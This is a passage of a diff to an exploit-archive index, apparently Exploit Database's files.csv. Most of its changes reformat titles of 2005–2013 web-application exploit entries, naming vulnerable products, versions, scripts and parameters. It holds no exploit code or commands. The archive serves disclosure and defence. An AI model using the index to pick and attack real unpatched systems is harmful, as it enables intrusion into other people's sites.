Injection",2013-02-17,3spi0n,php,webapps,0 -24492,platforms/php/webapps/24492.php,"OpenEMR 4.1.1 - (ofc_upload_image.php) Arbitrary File Upload",2013-02-13,LiquidWorm,php,webapps,0 +24492,platforms/php/webapps/24492.php,"OpenEMR 4.1.1 - 'ofc_upload_image.php' Arbitrary File Upload",2013-02-13,LiquidWorm,php,webapps,0 24496,platforms/windows/webapps/24496.txt,"SonicWALL Scrutinizer 9.5.2 - SQL Injection",2013-02-14,Vulnerability-Lab,windows,webapps,0 24497,platforms/hardware/webapps/24497.txt,"Transferable Remote 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-14,Vulnerability-Lab,hardware,webapps,0 24498,platforms/hardware/webapps/24498.txt,"OpenPLI 3.0 Beta (OpenPLi-beta-dm7000-20130127-272) - Multiple Vulnerabilities",2013-02-14,m-1-k-3,hardware,webapps,0 @@ -27033,11 +27036,11 @@ id,file,description,date,author,platform,type,port 24534,platforms/windows/webapps/24534.txt,"Alt-N MDaemon 13.0.3 / 12.5.6 - Email Body HTML/JS Injection",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0 24535,platforms/windows/webapps/24535.txt,"Alt-N MDaemon WorldClient 13.0.3 - Multiple Vulnerabilities",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0 24536,platforms/php/webapps/24536.txt,"glFusion 1.2.2 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-21,"High-Tech Bridge SA",php,webapps,0 -24537,platforms/php/webapps/24537.txt,"PHPMyRecipes 1.2.2 - (viewrecipe.php r_id Parameter) SQL Injection",2013-02-21,cr4wl3r,php,webapps,0 +24537,platforms/php/webapps/24537.txt,"PHPMyRecipes 1.2.2 - 'viewrecipe.php r_id Parameter' SQL Injection",2013-02-21,cr4wl3r,php,webapps,0 24540,platforms/php/webapps/24540.pl,"Brewthology 0.1 - SQL Injection",2013-02-26,cr4wl3r,php,webapps,0 24542,platforms/php/webapps/24542.txt,"Rix4Web Portal - Blind SQL Injection",2013-02-26,L0n3ly-H34rT,php,webapps,0 24543,platforms/ios/webapps/24543.txt,"iOS IPMap 2.5 - Arbitrary File Upload",2013-02-26,Vulnerability-Lab,ios,webapps,0 -24544,platforms/php/webapps/24544.txt,"MTP Image Gallery 1.0 - (edit_photos.php title Parameter) Cross-Site Scripting",2013-02-26,LiquidWorm,php,webapps,0 +24544,platforms/php/webapps/24544.txt,"MTP Image Gallery 1.0 - 'edit_photos.php title Parameter' Cross-Site Scripting",2013-02-26,LiquidWorm,php,webapps,0 24545,platforms/php/webapps/24545.txt,"MTP Guestbook 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0 24546,platforms/php/webapps/24546.txt,"MTP Poll 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0 24550,platforms/hardware/webapps/24550.txt,"WiFilet 1.2 iPad iPhone - Multiple Vulnerabilities",2013-02-26,Vulnerability-Lab,hardware,webapps,0 @@ -27197,7 +27200,7 @@ id,file,description,date,author,platform,type,port 24850,platforms/php/webapps/24850.txt,"WordPress Plugin Simply Poll 1.4.1 - Multiple Vulnerabilities",2013-03-18,m3tamantra,php,webapps,0 24851,platforms/php/webapps/24851.txt,"Joomla! Component 'com_rsfiles' - 'cid' Parameter SQL Injection",2013-03-18,ByEge,php,webapps,0 24858,platforms/php/webapps/24858.html,"WordPress Plugin Occasions 1.0.4 - Cross-Site Request Forgery",2013-03-19,m3tamantra,php,webapps,0 -24859,platforms/php/webapps/24859.rb,"WordPress Plugin Count Per Day 3.2.5 - (counter.php) Cross-Site Scripting",2013-03-19,m3tamantra,php,webapps,0 +24859,platforms/php/webapps/24859.rb,"WordPress Plugin Count Per Day 3.2.5 - 'counter.php' Cross-Site Scripting",2013-03-19,m3tamantra,php,webapps,0 24860,platforms/hardware/webapps/24860.txt,"Verizon Fios Router MI424WR-GEN3I - Cross-Site Request Forgery",2013-03-19,"Jacob Holcomb",hardware,webapps,0 24861,platforms/php/webapps/24861.txt,"Rebus:list - 'list.php list_id Parameter' SQL Injection",2013-03-19,"Robert Cooper",php,webapps,0 24862,platforms/php/webapps/24862.txt,"ViewGit 0.0.6 - Multiple Cross-Site Scripting Vulnerabilities",2013-03-19,"Matthew R. Bucci",php,webapps,0 @@ -27217,8 +27220,8 @@ id,file,description,date,author,platform,type,port 24894,platforms/php/webapps/24894.txt,"ClipShare 4.1.1 - Multiples Vulnerabilities",2013-03-27,Esac,php,webapps,0 24898,platforms/php/webapps/24898.txt,"SynConnect Pms - 'index.php loginid Parameter' SQL Injection",2013-03-29,"Bhadresh Patel",php,webapps,0 24901,platforms/windows/webapps/24901.txt,"MailOrderWorks 5.907 - Multiple Vulnerabilities",2013-03-29,Vulnerability-Lab,windows,webapps,0 -24906,platforms/php/webapps/24906.txt,"AWS Xms 2.5 - (importer.php what Parameter) Directory Traversal",2013-03-29,"High-Tech Bridge SA",php,webapps,0 -24911,platforms/php/webapps/24911.txt,"Pollen CMS 0.6 - (index.php p Parameter) Local File Disclosure",2013-04-02,MizoZ,php,webapps,0 +24906,platforms/php/webapps/24906.txt,"AWS Xms 2.5 - 'importer.php what Parameter' Directory Traversal",2013-03-29,"High-Tech Bridge SA",php,webapps,0 +24911,platforms/php/webapps/24911.txt,"Pollen CMS 0.6 - 'index.php p Parameter' Local File Disclosure",2013-04-02,MizoZ,php,webapps,0 24913,platforms/php/webapps/24913.txt,"Network Weathermap 0.97a - 'editor.php' Persistent Cross-Site Scripting",2013-04-02,"Daniel Ricardo dos Santos",php,webapps,0 24914,platforms/php/webapps/24914.txt,"WordPress Plugin FuneralPress 1.1.6 - Persistent Cross-Site Scripting",2013-04-02,"Rob Armstrong",php,webapps,0 24915,platforms/multiple/webapps/24915.txt,"Aspen 0.8 - Directory Traversal",2013-04-02,"Daniel Ricardo dos Santos",multiple,webapps,0 @@ -27228,7 +27231,7 @@ id,file,description,date,author,platform,type,port 24927,platforms/php/webapps/24927.txt,"Vanilla Forums 2-0-18-4 - SQL Injection",2013-04-08,bl4ckw0rm,php,webapps,0 24928,platforms/hardware/webapps/24928.txt,"TP-Link TD-8817 6.0.1 Build 111128 Rel.26763 - Cross-Site Request Forgery",2013-04-08,Un0wn_X,hardware,webapps,0 24932,platforms/linux/webapps/24932.txt,"Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities",2013-04-08,"SEC Consult",linux,webapps,0 -24934,platforms/php/webapps/24934.txt,"WHMCS Group Pay Plugin 1.5 - (grouppay.php hash Parameter) SQL Injection",2013-04-08,"HJauditing Employee Tim",php,webapps,0 +24934,platforms/php/webapps/24934.txt,"WHMCompleteSolution (WHMCS) Group Pay Plugin 1.5 - 'grouppay.php hash Parameter' SQL Injection",2013-04-08,"HJauditing Employee Tim",php,webapps,0 24957,platforms/php/webapps/24957.txt,"Vanilla Forums Van2Shout Plugin 1.0.51 - Multiple Cross-Site Request Forgery Vulnerabilities",2013-04-15,"Henry Hoggard",php,webapps,0 24969,platforms/php/webapps/24969.txt,"Joomla! Component com_civicrm 4.2.2 - Remote Code Injection",2013-04-22,iskorpitx,php,webapps,0 24942,platforms/php/webapps/24942.txt,"ZAPms 1.41 - SQL Injection",2013-04-09,NoGe,php,webapps,0 @@ -27528,7 +27531,7 @@ id,file,description,date,author,platform,type,port 25438,platforms/php/webapps/25438.txt,"MVNForum 1.0 - Search Cross-Site Scripting",2005-04-18,"hoang yen",php,webapps,0 25440,platforms/php/webapps/25440.txt,"WordPress Plugin wp-FileManager - Arbitrary File Download",2013-05-14,ByEge,php,webapps,0 25441,platforms/php/webapps/25441.txt,"IPB (Invision Power Board) 1.x? / 2.x / 3.x - Admin Account Takeover",2013-05-14,"John JEAN",php,webapps,0 -25442,platforms/php/webapps/25442.txt,"WHMCS 4.x - (invoicefunctions.php id Parameter) SQL Injection",2013-05-14,"Ahmed Aboul-Ela",php,webapps,0 +25442,platforms/php/webapps/25442.txt,"WHMCS 4.x - 'invoicefunctions.php id Parameter' SQL Injection",2013-05-14,"Ahmed Aboul-Ela",php,webapps,0 25447,platforms/php/webapps/25447.txt,"Alienvault Open Source SIEM (OSSIM) 4.1.2 - Multiple SQL Injections",2013-05-14,RunRunLevel,php,webapps,0 25449,platforms/php/webapps/25449.txt,"UMI CMS 2.9 - Cross-Site Request Forgery",2013-05-14,"High-Tech Bridge SA",php,webapps,0 25451,platforms/php/webapps/25451.txt,"phpBB 1.x/2.0.x - Knowledge Base Module KB.php SQL Injection",2005-04-13,deluxe@security-project.org,php,webapps,0 @@ -27721,11 +27724,11 @@ id,file,description,date,author,platform,type,port 25704,platforms/php/webapps/25704.txt,"PHP Poll Creator 1.0.1 - Poll_Vote.php Remote File Inclusion",2005-05-25,"rash ilusion",php,webapps,0 25705,platforms/asp/webapps/25705.txt,"FunkyASP AD Systems 1.1 - 'login.asp' SQL Injection",2005-05-25,Romty,asp,webapps,0 25715,platforms/hardware/webapps/25715.py,"HP LaserJet Pro P1606dn - Webadmin Password Reset",2013-05-26,m3tamantra,hardware,webapps,0 -25716,platforms/php/webapps/25716.py,"AVE.CMS 2.09 - (index.php module Parameter) Blind SQL Injection",2013-05-26,mr.pr0n,php,webapps,0 +25716,platforms/php/webapps/25716.py,"AVE.CMS 2.09 - 'index.php module Parameter' Blind SQL Injection",2013-05-26,mr.pr0n,php,webapps,0 25721,platforms/php/webapps/25721.txt,"WordPress Plugin User Role Editor 3.12 - Cross-Site Request Forgery",2013-05-26,"Henry Hoggard",php,webapps,0 25723,platforms/php/webapps/25723.txt,"WordPress Plugin Spider Event Calendar 1.3.0 - Multiple Vulnerabilities",2013-05-26,waraxe,php,webapps,0 25724,platforms/php/webapps/25724.txt,"WordPress Plugin Spider Catalog 1.4.6 - Multiple Vulnerabilities",2013-05-26,waraxe,php,webapps,0 -25726,platforms/php/webapps/25726.txt,"RadioCMS 2.2 - (menager.php playlist_id Parameter) SQL Injection",2013-05-26,Rooster(XEKA),php,webapps,0 +25726,platforms/php/webapps/25726.txt,"RadioCMS 2.2 - 'menager.php playlist_id Parameter' SQL Injection",2013-05-26,Rooster(XEKA),php,webapps,0 25727,platforms/php/webapps/25727.txt,"BookReview 1.0 - add_review.htm Multiple Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 25728,platforms/php/webapps/25728.txt,"BookReview 1.0 - add_contents.htm Multiple Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 25729,platforms/php/webapps/25729.txt,"BookReview 1.0 - suggest_category.htm node Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 @@ -27787,7 +27790,7 @@ id,file,description,date,author,platform,type,port 25778,platforms/php/webapps/25778.txt,"Calendarix 0.8.20071118 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2005-05-31,DarkBicho,php,webapps,0 25779,platforms/php/webapps/25779.txt,"MyBB - Multiple Cross-Site Scripting / SQL Injection",2005-05-31,"Alberto Trivero",php,webapps,0 25780,platforms/asp/webapps/25780.txt,"JiRo's Upload System 1.0 - 'login.asp' SQL Injection",2005-06-01,Romty,asp,webapps,0 -25781,platforms/asp/webapps/25781.txt,"NEXTWEB - (i)Site 'login.asp' SQL Injection",2005-06-01,"Jim Pangalos",asp,webapps,0 +25781,platforms/asp/webapps/25781.txt,"NEXTWEB (i)Site - 'login.asp' SQL Injection",2005-06-01,"Jim Pangalos",asp,webapps,0 25783,platforms/asp/webapps/25783.txt,"Livingcolor Livingmailing 1.3 - 'login.asp' SQL Injection",2005-06-01,"Dj romty",asp,webapps,0 25785,platforms/asp/webapps/25785.txt,"Liberum Help Desk 0.97.3 - Multiple SQL Injections",2005-06-02,"Dedi Dwianto",asp,webapps,0 25786,platforms/php/webapps/25786.txt,"MWChat 6.7 - Start_Lobby.php Remote File Inclusion",2005-06-03,Status-x,php,webapps,0 @@ -27936,7 +27939,7 @@ id,file,description,date,author,platform,type,port 25968,platforms/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - File Disclosure",2013-06-05,"Todor Donev",hardware,webapps,0 25969,platforms/hardware/webapps/25969.txt,"Netgear WPN824v3 - Unauthorized Config Download",2013-06-05,"Jens Regel",hardware,webapps,0 25971,platforms/php/webapps/25971.txt,"Cuppa CMS - 'alertConfigField.php' Remote / Local File Inclusion",2013-06-05,"CWH Underground",php,webapps,0 -25973,platforms/php/webapps/25973.txt,"Ruubikcms 1.1.1 - (tinybrowser.php folder Parameter) Directory Traversal",2013-06-05,expl0i13r,php,webapps,0 +25973,platforms/php/webapps/25973.txt,"Ruubikcms 1.1.1 - 'tinybrowser.php folder Parameter' Directory Traversal",2013-06-05,expl0i13r,php,webapps,0 25976,platforms/hardware/webapps/25976.txt,"DS3 - Authentication Server - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",hardware,webapps,0 25977,platforms/jsp/webapps/25977.txt,"Imperva SecureSphere Operations Manager 9.0.0.5 - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",jsp,webapps,0 25978,platforms/hardware/webapps/25978.txt,"Netgear DGN1000 / DGN2200 - Multiple Vulnerabilities",2013-06-05,"Roberto Paleari",hardware,webapps,80 @@ -28063,7 +28066,7 @@ id,file,description,date,author,platform,type,port 26127,platforms/php/webapps/26127.txt,"TriggerTG TClanPortal 3.0 - Multiple SQL Injections",2005-08-09,admin@batznet.com,php,webapps,0 26129,platforms/hardware/webapps/26129.txt,"Buffalo WZR-HP-G300NH2 - Cross-Site Request Forgery",2013-06-11,"Prayas Kulshrestha",hardware,webapps,0 26132,platforms/php/webapps/26132.txt,"Fobuc Guestbook 0.9 - SQL Injection",2013-06-11,"CWH Underground",php,webapps,0 -26136,platforms/php/webapps/26136.txt,"Simple PHP Agenda 2.2.8 - (edit_event.php eventid Parameter) SQL Injection",2013-06-11,"Anthony Dubuissez",php,webapps,0 +26136,platforms/php/webapps/26136.txt,"Simple PHP Agenda 2.2.8 - 'edit_event.php eventid Parameter' SQL Injection",2013-06-11,"Anthony Dubuissez",php,webapps,0 26140,platforms/php/webapps/26140.txt,"ezUpload 2.2 - 'index.php' path Parameter Remote File Inclusion",2005-08-10,"Johnnie Walker",php,webapps,0 26141,platforms/php/webapps/26141.txt,"ezUpload 2.2 - initialize.php path Parameter Remote File Inclusion",2005-08-10,"Johnnie Walker",php,webapps,0 26142,platforms/php/webapps/26142.txt,"ezUpload 2.2 - customize.php path Parameter Remote File Inclusion",2005-08-10,"Johnnie Walker",php,webapps,0 @@ -28253,7 +28256,7 @@ id,file,description,date,author,platform,type,port 26399,platforms/php/webapps/26399.txt,"Belchior Foundry VCard 2.9 - Remote File Inclusion",2005-10-26,X,php,webapps,0 26400,platforms/php/webapps/26400.txt,"Flyspray 0.9 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-26,Lostmon,php,webapps,0 26401,platforms/hardware/webapps/26401.txt,"TRENDnet TE100-P1U Print Server Firmware 4.11 - Authentication Bypass",2013-06-24,Chako,hardware,webapps,0 -26405,platforms/php/webapps/26405.txt,"Top Games Script 1.2 - (play.php gid Parameter) SQL Injection",2013-06-24,AtT4CKxT3rR0r1ST,php,webapps,0 +26405,platforms/php/webapps/26405.txt,"Top Games Script 1.2 - 'play.php gid Parameter' SQL Injection",2013-06-24,AtT4CKxT3rR0r1ST,php,webapps,0 26406,platforms/php/webapps/26406.txt,"Alienvault Open Source SIEM (OSSIM) 4.1 - Multiple SQL Injection Vulnerabilities",2013-06-24,"Glafkos Charalambous",php,webapps,0 27541,platforms/php/webapps/27541.txt,"DbbS 2.0 - Topics.php SQL Injection",2006-03-31,DaBDouB-MoSiKaR,php,webapps,0 27542,platforms/php/webapps/27542.txt,"SoftBiz Image Gallery - mage_desc.php Multiple Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 @@ -28262,7 +28265,7 @@ id,file,description,date,author,platform,type,port 26410,platforms/php/webapps/26410.py,"Collabtive 1.0 - 'manageuser.php' SQL Injection",2013-06-24,drone,php,webapps,0 26414,platforms/php/webapps/26414.txt,"PodHawk 1.85 - Arbitrary File Upload",2013-06-24,"CWH Underground",php,webapps,0 26415,platforms/hardware/webapps/26415.txt,"Linksys X3000 1.0.03 build 001 - Multiple Vulnerabilities",2013-06-24,m-1-k-3,hardware,webapps,0 -26416,platforms/php/webapps/26416.txt,"Elemata CMS RC3.0 - (global.php id Parameter) SQL Injection",2013-06-24,"CWH Underground",php,webapps,0 +26416,platforms/php/webapps/26416.txt,"Elemata CMS RC3.0 - 'global.php id Parameter' SQL Injection",2013-06-24,"CWH Underground",php,webapps,0 26827,platforms/php/webapps/26827.txt,"QuickPayPro 3.1 - popups.edit.php popupid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 26423,platforms/php/webapps/26423.txt,"Mantis 0.19.2/1.0 - Bug_sponsorship_list_view_inc.php File Inclusion",2005-10-26,"Andreas Sandblad",php,webapps,0 26425,platforms/php/webapps/26425.pl,"Woltlab 1.1/2.x - Info-DB Info_db.php Multiple SQL Injection",2005-10-26,admin@batznet.com,php,webapps,0 @@ -28288,7 +28291,7 @@ id,file,description,date,author,platform,type,port 26446,platforms/php/webapps/26446.txt,"Belchior Foundry vCard Pro 3.1 - Addrbook.php SQL Injection",2005-11-01,almaster,php,webapps,0 26447,platforms/php/webapps/26447.html,"Elite Forum 1.0 - HTML Injection",2005-11-01,gladiator,php,webapps,0 26449,platforms/php/webapps/26449.txt,"e107 Advanced Medal System Plugin - SQL Injection",2013-06-26,"Life Wasted",php,webapps,0 -26453,platforms/php/webapps/26453.py,"PHP-Charts 1.0 - (index.php type Parameter) Remote Code Execution",2013-06-26,infodox,php,webapps,0 +26453,platforms/php/webapps/26453.py,"PHP-Charts 1.0 - 'index.php type Parameter' Remote Code Execution",2013-06-26,infodox,php,webapps,0 26455,platforms/php/webapps/26455.txt,"VUBB - 'index.php' Cross-Site Scripting",2005-11-01,"Alireza Hassani",php,webapps,0 26456,platforms/php/webapps/26456.txt,"XMB Forum 1.9.3 - post.php SQL Injection",2005-11-01,almaster,php,webapps,0 26458,platforms/php/webapps/26458.txt,"News2Net 3.0 - 'index.php' SQL Injection",2005-11-02,Mousehack,php,webapps,0 @@ -28709,7 +28712,7 @@ id,file,description,date,author,platform,type,port 26959,platforms/php/webapps/26959.txt,"Papoo 2.1.2 - 'index.php' menuid Parameter SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0 26960,platforms/php/webapps/26960.txt,"Papoo 2.1.2 - Guestbook.php menuid Parameter SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0 26961,platforms/php/webapps/26961.txt,"Papoo 2.1.2 - print.php Multiple Parameter SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0 -26962,platforms/php/webapps/26962.txt,"PHPSlash 0.8.1 - article.php SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0 +26962,platforms/php/webapps/26962.txt,"PHPSlash 0.8.1 - 'article.php' SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0 26963,platforms/asp/webapps/26963.txt,"Quantum Art QP7.Enterprise - news_and_events_new.asp p_news_id Parameter SQL Injection",2005-12-21,r0t3d3Vil,asp,webapps,0 26964,platforms/asp/webapps/26964.txt,"Quantum Art QP7.Enterprise - news.asp p_news_id Parameter SQL Injection",2005-12-21,r0t3d3Vil,asp,webapps,0 26965,platforms/php/webapps/26965.txt,"MusicBox 2.3 - 'type' Parameter SQL Injection",2005-12-22,"Medo HaCKer",php,webapps,0 @@ -28957,7 +28960,7 @@ id,file,description,date,author,platform,type,port 27275,platforms/php/webapps/27275.txt,"FunGamez - Arbitrary File Upload",2013-08-02,cr4wl3r,php,webapps,0 27276,platforms/php/webapps/27276.html,"BigACE 2.7.8 - Cross-Site Request Forgery (Add Admin)",2013-08-02,"Yashar shahinzadeh",php,webapps,0 27279,platforms/php/webapps/27279.txt,"vtiger CRM 5.4.0 (SOAP Services) - Multiple Vulnerabilities",2013-08-02,EgiX,php,webapps,0 -27281,platforms/php/webapps/27281.txt,"Telmanik CMS Press 1.01b - (pages.php page_name Parameter) SQL Injection",2013-08-02,"Anarchy Angel",php,webapps,0 +27281,platforms/php/webapps/27281.txt,"Telmanik CMS Press 1.01b - 'pages.php page_name Parameter' SQL Injection",2013-08-02,"Anarchy Angel",php,webapps,0 27283,platforms/hardware/webapps/27283.txt,"D-Link DIR-645 1.03B08 - Multiple Vulnerabilities",2013-08-02,"Roberto Paleari",hardware,webapps,0 27284,platforms/hardware/webapps/27284.txt,"INSTEON Hub 2242-222 - Lack of Web and API Authentication",2013-08-02,"Trustwave's SpiderLabs",hardware,webapps,0 27286,platforms/hardware/webapps/27286.txt,"MiCasaVerde VeraLite 1.5.408 - Multiple Vulnerabilities",2013-08-02,"Trustwave's SpiderLabs",hardware,webapps,0 @@ -29604,7 +29607,7 @@ id,file,description,date,author,platform,type,port 28179,platforms/php/webapps/28179.txt,"ATutor 1.5.x - 'users/browse.php' cat Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 28180,platforms/php/webapps/28180.txt,"ATutor 1.5.x - admin/fix_content.php submit Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 28184,platforms/hardware/webapps/28184.txt,"D-Link DIR-505 1.06 - Multiple Vulnerabilities",2013-09-10,"Alessandro Di Pinto",hardware,webapps,0 -28185,platforms/php/webapps/28185.txt,"glFusion 1.3.0 - (search.php cat_id Parameter) SQL Injection",2013-09-10,"Omar Kurt",php,webapps,0 +28185,platforms/php/webapps/28185.txt,"glFusion 1.3.0 - 'search.php cat_id Parameter' SQL Injection",2013-09-10,"Omar Kurt",php,webapps,0 28190,platforms/php/webapps/28190.txt,"Extcalendar 2.0 - Extcalendar.php Remote File Inclusion",2006-07-07,Matdhule,php,webapps,0 28191,platforms/php/webapps/28191.txt,"AjaXplorer 1.0 - Multiple Vulnerabilities",2013-09-10,"Trustwave's SpiderLabs",php,webapps,0 28192,platforms/php/webapps/28192.txt,"ATutor 1.5.3 - Multiple Input Validation Vulnerabilities",2006-07-08,securityconnection,php,webapps,0 @@ -29726,7 +29729,7 @@ id,file,description,date,author,platform,type,port 28403,platforms/php/webapps/28403.txt,"Mambo Component LMTG Myhomepage 1.2 - Multiple Remote File Inclusion",2006-08-18,O.U.T.L.A.W,php,webapps,0 28404,platforms/php/webapps/28404.txt,"Mambo Component Rssxt 1.0 - 'MosConfig_absolute_path' Parameter Multiple Remote File Inclusion",2006-08-18,Crackers_Child,php,webapps,0 28406,platforms/php/webapps/28406.txt,"XennoBB 1.0.x/2.2 - Icon_Topic SQL Injection",2006-08-19,"Chris Boulton",php,webapps,0 -28409,platforms/php/webapps/28409.txt,"Vtiger CRM 5.4.0 - (index.php onlyforuser Parameter) SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0 +28409,platforms/php/webapps/28409.txt,"Vtiger CRM 5.4.0 - 'index.php onlyforuser Parameter' SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0 28410,platforms/php/webapps/28410.txt,"Mambo Component Display MOSBot Manager - 'MosConfig_absolute_path' Parameter Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0 28411,platforms/php/webapps/28411.txt,"DieselScripts Job Site - Forgot.php Multiple Cross-Site Scripting Vulnerabilities",2006-08-21,night_warrior771,php,webapps,0 28412,platforms/php/webapps/28412.txt,"DieselScripts DieselPay - 'index.php' Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0 @@ -29930,7 +29933,7 @@ id,file,description,date,author,platform,type,port 28699,platforms/php/webapps/28699.txt,"CubeCart 3.0.x - /admin/print_order.php order_id Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 28652,platforms/hardware/webapps/28652.txt,"Asus RT-N66U 3.0.0.4.374_720 - Cross-Site Request Forgery",2013-09-30,cgcai,hardware,webapps,80 28653,platforms/linux/webapps/28653.txt,"mod_accounting Module 0.5 - Blind SQL Injection",2013-09-30,Wireghoul,linux,webapps,0 -28654,platforms/php/webapps/28654.txt,"XAMPP 1.8.1 - (lang.php WriteIntoLocalDisk method) Local Write Access",2013-09-30,"Manuel García Cárdenas",php,webapps,80 +28654,platforms/php/webapps/28654.txt,"XAMPP 1.8.1 - 'lang.php WriteIntoLocalDisk method' Local Write Access",2013-09-30,"Manuel García Cárdenas",php,webapps,80 28656,platforms/php/webapps/28656.txt,"SimpleRisk 20130915-01 - Multiple Vulnerabilities",2013-09-30,"Ryan Dewhurst",php,webapps,80 28661,platforms/php/webapps/28661.txt,"ToendaCMS 1.0.4 - Media.php Directory Traversal",2006-09-24,MoHaJaLi,php,webapps,0 28662,platforms/php/webapps/28662.txt,"Photostore - details.php gid Parameter Cross-Site Scripting",2006-09-25,meto5757,php,webapps,0 @@ -30040,7 +30043,7 @@ id,file,description,date,author,platform,type,port 28802,platforms/php/webapps/28802.txt,"Bloq 0.5.4 - files/mainfile.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0 28803,platforms/php/webapps/28803.txt,"Xoops 2.2.3 - search.php Cross-Site Scripting",2006-10-13,b0rizQ,php,webapps,0 28804,platforms/php/webapps/28804.pl,"phpBB Add Name Module - Not_Mem.php Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 -28807,platforms/php/webapps/28807.py,"WHMCS 5.2.7 - SQL Injection",2013-10-08,localhost.re,php,webapps,0 +28807,platforms/php/webapps/28807.py,"WHMCompleteSolution (WHMCS) 5.2.7 - SQL Injection",2013-10-08,localhost.re,php,webapps,0 28808,platforms/php/webapps/28808.txt,"WordPress Plugin Quick Contact Form 6.0 - Persistent Cross-Site Scripting",2013-10-08,Zy0d0x,php,webapps,0 28814,platforms/php/webapps/28814.txt,"RamaCMS - ADODB.Inc.php Remote File Inclusion",2006-10-13,"Le CoPrA",php,webapps,0 28815,platforms/php/webapps/28815.txt,"H-Sphere Webshell 2.x - 'login.php' Cross-Site Scripting",2006-10-14,b0rizQ,php,webapps,0 @@ -30049,7 +30052,7 @@ id,file,description,date,author,platform,type,port 28820,platforms/php/webapps/28820.txt,"Webgenius Goop Gallery 2.0 - 'index.php' Cross-Site Scripting",2006-10-17,Lostmon,php,webapps,0 28821,platforms/php/webapps/28821.txt,"Maintain 3.0.0-RC2 - Example6.php Remote File Inclusion",2006-10-16,ERNE,php,webapps,0 28823,platforms/php/webapps/28823.pl,"PowerMovieList 0.13/0.14 - Edit User HTML Injection",2006-10-16,MP,php,webapps,0 -28824,platforms/php/webapps/28824.txt,"PHPList 2.10.2 - 'index.php' Cross-Site Scripting",2006-10-17,b0rizQ,php,webapps,0 +28824,platforms/php/webapps/28824.txt,"phpList 2.10.2 - 'index.php' Cross-Site Scripting",2006-10-17,b0rizQ,php,webapps,0 28825,platforms/php/webapps/28825.txt,"Dev Web Manager System 1.5 - 'index.php' Cross-Site Scripting",2006-10-17,CorryL,php,webapps,0 28826,platforms/php/webapps/28826.txt,"Cerberus Helpdesk 3.2.1 - Rpc.php Unauthorized Access",2006-10-18,jonepet,php,webapps,0 28827,platforms/php/webapps/28827.txt,"PHP Live Helper 1.17 - Multiple Remote File Inclusion",2006-10-18,Matdhule,php,webapps,0 @@ -30162,7 +30165,7 @@ id,file,description,date,author,platform,type,port 28965,platforms/php/webapps/28965.txt,"Bitweaver 1.x - wiki/list_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 28967,platforms/php/webapps/28967.txt,"ExoPHPDesk 1.2 - 'Pipe.php' Remote File Inclusion",2006-11-11,Firewall1954,php,webapps,0 28970,platforms/php/webapps/28970.txt,"WordPress Plugin Dexs PM System - Authenticated Persistent Cross-Site Scripting",2013-10-15,TheXero,php,webapps,80 -28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - (exportcsv.php sondage Parameter) SQL Injection",2013-10-15,drone,php,webapps,80 +28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php sondage Parameter' SQL Injection",2013-10-15,drone,php,webapps,80 28972,platforms/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection / Remote Code Execution (Metasploit)",2013-10-15,"Jason Kratzer",unix,webapps,0 28975,platforms/ios/webapps/28975.txt,"My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,ios,webapps,0 28976,platforms/ios/webapps/28976.txt,"OliveOffice Mobile Suite 2.0.3 iOS - File Inclusion",2013-10-15,Vulnerability-Lab,ios,webapps,0 @@ -30244,7 +30247,7 @@ id,file,description,date,author,platform,type,port 29062,platforms/php/webapps/29062.txt,"phpMyAdmin 2.x - Multiple Script Array Handling Full Path Disclosure",2006-09-15,"laurent gaffie",php,webapps,0 29063,platforms/asp/webapps/29063.txt,"Xtreme ASP Photo Gallery 2.0 - displaypic.asp sortorder Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0 29064,platforms/asp/webapps/29064.txt,"Xtreme ASP Photo Gallery 2.0 - displaypic.asp catname Parameter Cross-Site Scripting",2006-11-16,"Aria-Security Team",asp,webapps,0 -29065,platforms/php/webapps/29065.txt,"WHMCS 5.2.8 - SQL Injection",2013-10-19,g00n,php,webapps,0 +29065,platforms/php/webapps/29065.txt,"WHMCompleteSolution (WHMCS) 5.2.8 - SQL Injection",2013-10-19,g00n,php,webapps,0 29150,platforms/php/webapps/29150.txt,"WordPress Theme SAICO 1.0 < 1.0.2 - Arbitrary File Upload",2013-10-24,"Byakuya Kouta",php,webapps,0 29221,platforms/cgi/webapps/29221.txt,"BlueSocket BSC 2100 5.0/5.1 - Admin.pl Cross-Site Scripting",2006-12-04,"Jesus Olmos 